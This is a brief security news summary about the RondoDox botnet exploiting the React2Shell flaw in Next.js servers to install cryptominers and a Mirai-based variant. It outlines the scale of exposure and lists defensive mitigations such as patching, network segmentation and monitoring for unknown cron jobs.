RondoDox Botnet Expands Scope With React2Shell Exploitation
Summary
Researchers report that the RondoDox botnet is exploiting the React2Shell flaw (CVE-2025-55182) to target Next.js Server Actions and achieve remote code execution. The campaign, observed ramping up since December, scans for vulnerable Next.js servers and installs multiple payloads including cryptominers, a Mirai-based IoT botnet variant and an aggressive loader that enforces persistence and removes competing malware.
The activity is widespread: researchers estimate around 90,300 exposed Next.js instances globally, and note that RondoDox can deploy binaries for x86, x86_64, MIPS, ARM and PowerPC, allowing infection across cloud instances, edge devices and IoT fleets.
Key Points
- RondoDox weaponises React2Shell (CVE-2025-55182) against Next.js Server Actions to gain initial access and RCE.
- Observed payloads include cryptominers, a Mirai-based botnet variant, and a loader that removes rival malware and creates persistence via cron jobs.
- Approximately 90,300 vulnerable Next.js servers are exposed worldwide, with major concentrations in the US, Germany, France and India.
- The botnet supports multiple architectures (x86, x86_64, MIPS, ARM, PowerPC) and uses fallback transfer methods (wget, curl, tftp, ftp) to maximise reach.
- Recommended mitigations: patch Next.js/React Server Components, segment IoT into VLANs, deploy a WAF, restrict internet exposure of admin/dev servers, monitor for unknown processes/cron jobs and block known C2 infrastructure.
Context and Relevance
RondoDox first surfaced exploiting DVRs and routers and has grown into a multi-purpose loader that now targets web frameworks as an initial vector. Its shift to exploiting a popular web framework vulnerability raises the stakes for web-facing applications and any connected IoT devices. Organisations running Next.js or exposing network appliances are at immediate risk from automated scanning and infection attempts that can lead to botnet enrolment, DDoS participation and stealth cryptomining.
Why should I read this?
Short and blunt: if you run Next.js apps, manage web servers or look after IoT kit, this matters. The exploit is active and automated — patching and basic network hygiene will help, but only if you act now. We’ve read the detail so you don’t have to; do a quick inventory sweep and apply fixes.